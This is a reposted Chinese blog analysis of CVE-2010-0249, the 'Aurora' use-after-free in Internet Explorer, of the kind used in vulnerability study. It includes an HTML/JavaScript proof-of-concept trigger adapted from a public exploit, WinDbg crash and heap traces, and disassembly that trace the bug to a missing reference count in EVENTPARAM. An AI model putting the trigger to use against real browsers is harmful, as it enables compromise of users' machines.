CVE-2010-0249 极光
生活随笔
收集整理的這篇文章主要介紹了
CVE-2010-0249 极光
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
傳說中的極光漏洞
Microsoft Internet Explorer非法事件操作內(nèi)存破壞漏洞
????????Microsoft Internet Explorer是微軟Windows操作系統(tǒng)中默認(rèn)捆綁的WEB瀏覽器。?
????????Microsoft Internet Explorer在處理非法的事件操作時(shí)存在內(nèi)存破壞漏洞。由于在創(chuàng)建對(duì)象以后沒有增加相應(yīng)的訪問記數(shù),惡意的對(duì)象操作流程可能導(dǎo)致指針指向被釋放后重使用的內(nèi)存,遠(yuǎn)程攻擊者可通過誘使用戶訪問惡意網(wǎng)頁非法操作內(nèi)存在用戶系統(tǒng)上執(zhí)行指令。
?
POC如下
<html> <head> <script> var obj, event_obj; function ev1(evt) { event_obj = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 1); } function ev2() { var data, tmp; data = ""; tmp = unescape("%u0a0a%u0a0a"); for (var i = 0 ; i < 4 ; i++) data += tmp; for (i = 0 ; i < obj.length ; i++ ) { obj[i].data = data; } event_obj.srcElement; } obj = new Array(); event_obj = null; for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT"); </script> </head> <body> <span id="sp1"> <img src="aurora.gif" onload="ev1(event)"> </span> </body> </html>沒能找到合適的POC,這個(gè)是我用網(wǎng)上的exp修改來的,有些繁瑣。
?
開門見山,直接看出了是CBody對(duì)象發(fā)生的UAF
1:020> g (c60.b2c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0 eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:07540fc8=???????? 1:020> !heap -p -a ecxaddress 07540fc8 found in_DPH_HEAP_ROOT @ 1b1000in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)7db21d4: 7540000 2000702290b2 verifier!AVrfDebugPageHeapFree+0x000000c277285674 ntdll!RtlDebugFreeHeap+0x0000002f77247aca ntdll!RtlpFreeHeap+0x0000005d77212d68 ntdll!RtlFreeHeap+0x000001427710f1ac kernel32!HeapFree+0x00000014683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x0000002268387dd0 mshtml!CBase::SubRelease+0x000000226837c482 mshtml!CElement::PrivateRelease+0x0000002a6837b034 mshtml!PlainRelease+0x00000025683d669d mshtml!PlainTrackerRelease+0x000000146bd0a6f1 jscript!VAR::Clear+0x0000005f6bd26d66 jscript!GcContext::Reclaim+0x000000b66bd24309 jscript!GcContext::CollectCore+0x000001236bd24a4a jscript!CScriptRuntime::Run+0x000039dc6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce6bd15bfb jscript!ScrFncObj::Call+0x0000008d6bd15e11 jscript!CSession::Execute+0x0000015f6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b56bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c6bd096de jscript!NameTbl::Invoke+0x000000706834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x000000876834ab66 mshtml!CWindow::FireTimeOut+0x000000b668376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b668371e57 mshtml!GlobalWndProc+0x0000018376c686ef USER32!InternalCallWinProc+0x0000002376c68876 USER32!UserCallWinProcCheckWow+0x0000014b76c689b5 USER32!DispatchMessageWorker+0x0000035e76c68e9c USER32!DispatchMessageW+0x0000000f6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x000004526ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c176a749bd iertutil!CIsoScope::RegisterThread+0x000000ab77111174 kernel32!BaseThreadInitThunk+0x0000000e比較詭異的是這個(gè)漏洞會(huì)有兩種不同的crash情況。
1.
1:020> g (e18.18c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=046a3f08 ebx=ffffffff ecx=07c4afd0 edx=0434f1a4 esi=07acaf58 edi=07f9afb0 eip=684188c7 esp=0434f198 ebp=0434f1ac iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CEventObj::GenericGetElement+0x91: 684188c7 8b37 mov esi,dword ptr [edi] ds:0023:07f9afb0=????????2.
1:021> g (4e4.f68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=073f5f08 ebx=ffffffff ecx=06e9bfc8 edx=040feeec esi=06e9bfc8 edi=097a2fb0 eip=6837c400 esp=040feedc ebp=040feef4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:06e9bfc8=????????跟蹤這個(gè)GenericGetElement函數(shù)發(fā)現(xiàn)是存在著調(diào)用關(guān)系
.text:74E78864 ; =============== S U B R O U T I N E ======================================= .text:74E78864 .text:74E78864 ; Attributes: bp-based frame .text:74E78864 .text:74E78864 ; private: long __thiscall CEventObj::GenericGetElement(struct IHTMLElement * *, long) .text:74E78864 ?GenericGetElement@CEventObj@@AAEJPAPAUIHTMLElement@@J@Z proc near .text:74E78864 ; CODE XREF: CEventObj::get_srcElement(IHTMLElement * *)+10p .text:74E78864 ; CEventObj::get_toElement(IHTMLElement * *)+10p ... .text:74E78864 .text:74E78864 var_8 = dword ptr -8 .text:74E78864 var_4 = dword ptr -4 .text:74E78864 arg_0 = dword ptr 8 .text:74E78864 arg_4 = dword ptr 0Ch .text:74E78864 arg_8 = dword ptr 10h .text:74E78864 .text:74E78864 ; FUNCTION CHUNK AT .text:74C3D32B SIZE 00000023 BYTES .text:74E78864 ; FUNCTION CHUNK AT .text:74E7F850 SIZE 0000001E BYTES .text:74E78864 ; FUNCTION CHUNK AT .text:74E8524A SIZE 00000030 BYTES .text:74E78864 ; FUNCTION CHUNK AT .text:74EB0C78 SIZE 00000022 BYTES .text:74E78864 .text:74E78864 mov edi, edi .text:74E78866 push ebp .text:74E78867 mov ebp, esp .text:74E78869 push ecx .text:74E7886A push ecx .text:74E7886B and [ebp+var_4], 0 .text:74E7886F push esi .text:74E78870 mov esi, [ebp+arg_4] .text:74E78873 test esi, esi .text:74E78875 jz loc_74EB0C78 .text:74E7887B push [ebp+arg_8] .text:74E7887E and dword ptr [esi], 0 .text:74E78881 push [ebp+arg_0] .text:74E78884 lea eax, [ebp+var_8] .text:74E78887 call ?GetUnknownPtr@CEventObj@@AAEJJPAPAUIUnknown@@@Z ; CEventObj::GetUnknownPtr(long,IUnknown * *) .text:74E7888C test eax, eax .text:74E7888E jz loc_74E78927 .text:74E78894 mov eax, [ebp+var_8] .text:74E78897 mov ecx, [ebp+arg_0] .text:74E7889A lea edx, [ebp+var_8] .text:74E7889D mov [esi], eax .text:74E7889F call ?GetParam@CEventObj@@QAEJPAPAUEVENTPARAM@@@Z ; CEventObj::GetParam(EVENTPARAM * *) .text:74E788A4 mov [ebp+var_4], eax .text:74E788A7 test eax, eax .text:74E788A9 jnz short loc_74E78927 .text:74E788AB mov eax, [ebp+arg_8] .text:74E788AE sub eax, 3E9h .text:74E788B3 push ebx .text:74E788B4 push edi .text:74E788B5 jnz loc_74E7F850 .text:74E788BB mov eax, [ebp+var_8] .text:74E788BE mov edi, [eax] .text:74E788C0 mov ebx, [eax+74h] .text:74E788C3 test edi, edi .text:74E788C5 jz short loc_74E78925 .text:74E788C7 mov esi, [edi] //一個(gè)crash地點(diǎn) .text:74E788C9 test esi, esi .text:74E788CB jz short loc_74E78925 .text:74E788CD mov ecx, esi .text:74E788CF call ?Doc@CElement@@QBEPAVCDoc@@XZ ; CElement::Doc(void) //另一個(gè)crash地點(diǎn)?分析以上這段代碼可以發(fā)現(xiàn)
?CEventObj::GenericGetElement函數(shù)首先是通過CEventObj::GetUnknownPtr獲取到一個(gè)數(shù)據(jù)結(jié)構(gòu)的指針,然后從這個(gè)數(shù)據(jù)結(jié)構(gòu)+00位置索引出一個(gè)值。這個(gè)值也是個(gè)指針,再用這個(gè)指針?biāo)饕鲆粋€(gè)值。而這個(gè)最后被索引出來的值就是被傳入CElement::Doc中的ecx,也就是CBody元素的指針。
?
1:020> !heap -p -a eaxaddress 06bf6f08 found in_DPH_HEAP_ROOT @ 1f1000in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)6ab2410: 6bf6f08 f8 - 6bf6000 200070228e89 verifier!AVrfDebugPageHeapAllocate+0x0000022977284ea6 ntdll!RtlDebugAllocateHeap+0x0000003077247d96 ntdll!RtlpAllocateHeap+0x000000c4772134ca ntdll!RtlAllocateHeap+0x0000023a683ec873 mshtml!EVENTPARAM::operator new+0x00000013684fd2c5 mshtml!CDocument::createEventObject+0x0000008368532791 mshtml!Method_IDispatchpp_o0oVARIANTp+0x000000ea683f235c mshtml!CBase::ContextInvokeEx+0x000005dc683f25d5 mshtml!CBase::InvokeEx+0x00000025683fdf9a mshtml!DispatchInvokeCollection+0x0000014c683b4998 mshtml!CDocument::InvokeEx+0x000000f0683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020683a3104 mshtml!PlainInvokeEx+0x000000eb68a3a22a jscript!IDispatchExInvokeEx2+0x0000010468a3a175 jscript!IDispatchExInvokeEx+0x0000006a68a3a3f6 jscript!InvokeDispatchEx+0x0000009868a3a4a0 jscript!VAR::InvokeByName+0x0000013968a4d8c8 jscript!VAR::InvokeDispName+0x0000007d68a4d96f jscript!VAR::InvokeByDispID+0x000000ce68a451b6 jscript!CScriptRuntime::Run+0x00002a9768a45c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce68a45bfb jscript!ScrFncObj::Call+0x0000008d68a45e11 jscript!CSession::Execute+0x0000015f68a3f3ee jscript!NameTbl::InvokeDef+0x000001b568a3ea2e jscript!NameTbl::InvokeEx+0x0000012c68a3a22a jscript!IDispatchExInvokeEx2+0x0000010468a3a175 jscript!IDispatchExInvokeEx+0x0000006a68a3f5f8 jscript!NameTbl::InvokeEx+0x0000037a684019cb mshtml!CScriptCollection::InvokeEx+0x0000008a683ff451 mshtml!CWindow::InvokeEx+0x000006ad683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020683a3104 mshtml!PlainInvokeEx+0x000000eb由上述的回溯可知,數(shù)據(jù)結(jié)構(gòu)應(yīng)該是EVENTPARAM。通過查閱資料得知EVENTPARAM+00位置的是CTreeNode的指針。
1:020> g Breakpoint 0 hit eax=04687fc8 ebx=0725efd0 ecx=00000034 edx=00000000 esi=0725ef08 edi=05570e00 eip=68323aa3 esp=043af658 ebp=043af664 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CImgElement::CImgElement: 68323aa3 8bff mov edi,edi 1:020> ? esi Evaluate expression: 119926536 = 0725ef08 1:020> g Breakpoint 1 hit eax=0989cfb0 ebx=00000000 ecx=0989cfb0 edx=00000000 esi=06fcdf40 edi=04687fc8 eip=6838ced0 esp=043af624 ebp=043af63c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode: 6838ced0 8bff mov edi,edi 1:020> ? eax Evaluate expression: 160026544 = 0989cfb0 1:020> g (b08.9bc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=098d4f08 ebx=ffffffff ecx=04687fc8 edx=043af044 esi=04687fc8 edi=0989cfb0 eip=6837c400 esp=043af034 ebp=043af04c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:04687fc8=???????? 1:020> dd 0989cfb0 0989cfb0 04687fc8 00000000 ffff4034 ffffffff 0989cfc0 00000051 00000000 abcdbbbb 00221000 0989cfd0 00000014 00001000 00000000 00000000 0989cfe0 0044e1c4 dcbabbbb 6ea50124 00000002 0989cff0 6ea4fef8 6ea500e4 6ea500d0 d0d0d0d0 0989d000 ???????? ???????? ???????? ???????? 0989d010 ???????? ???????? ???????? ???????? 0989d020 ???????? ???????? ???????? ????????調(diào)試的結(jié)果證實(shí)了我的猜想。
這個(gè)洞的問題就是使用EVENTPARAM引用對(duì)象的時(shí)候,卻沒有增加對(duì)象的引用計(jì)數(shù)。導(dǎo)致了懸垂指針的產(chǎn)生。當(dāng)對(duì)象的引用計(jì)數(shù)耗盡,對(duì)象就會(huì)被釋放。但是EVENTPARAM的懸垂指針就產(chǎn)生了。
轉(zhuǎn)載于:https://www.cnblogs.com/Ox9A82/p/5837769.html
總結(jié)
以上是生活随笔為你收集整理的CVE-2010-0249 极光的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: web框架django初探
- 下一篇: swift混编oc碰到的问题